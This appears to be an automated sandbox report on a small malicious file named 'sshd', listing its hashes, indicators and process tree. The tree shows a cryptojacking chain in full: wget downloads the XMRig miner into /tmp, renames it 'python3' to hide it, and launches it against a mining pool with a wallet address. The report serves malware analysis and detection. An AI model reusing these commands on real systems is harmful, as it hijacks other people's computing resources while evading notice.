986b11952fe8b5764c39bc39ab3656b4f3b14c331cf32cfea6d8b0079c81e5f3

Resubmissions

20-01-2025 17:41

20-01-2025 17:38

max time kernel
18s
max time network
23s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240729-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
20-01-2025 17:38

Target

sshd
Size

496B
MD5

bde8eb67612ae4246e358fc8a75e4f04
SHA1

d1e03cf4130281b525f8a5d51abc3c3917c58d58
SHA256

986b11952fe8b5764c39bc39ab3656b4f3b14c331cf32cfea6d8b0079c81e5f3
SHA512

ac62ad5f3628caef1f68a4ead799e234cb440c321a51ea589e442ceee6b24ce3f56b4c958e770abb4b7ddfbed8c731cd801b58f3ce68011b53c3b8c46688eb28

Score

3^/10

discovery

Reads runtime system information 3 IoCs

Reads data from /proc virtual filesystem.

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sshd.tgz	wget

/tmp/sshd
/tmp/sshd
1⤵
PID:1395
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz -O sshd.tgz
  2⤵
  - Writes file to tmp directory
  PID:1396
- /usr/bin/tar
  tar -xf sshd.tgz
  2⤵
  - Reads runtime system information
  PID:1436
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1437
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1437
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1437
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1437
- /usr/bin/rm
  rm sshd.tgz -fr
  2⤵
  PID:1438
- /usr/bin/mv
  mv xmrig-6.22.2 sshd_common
  2⤵
  - Reads runtime system information
  PID:1439
- /usr/bin/mv
  mv xmrig python3
  2⤵
  - Reads runtime system information
  PID:1440
- /tmp/python3
  ./python3 -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:47zqPD9abK85U1mLET6U3ZPAUGEWg45fiGSacihNC2kP2SQvsbqTdwY5QgRpssfSfHhHP4JhPRZ8KZPuLq4jwqSMEZtsN4q.linux3108 -p crypter
  2⤵
  PID:1442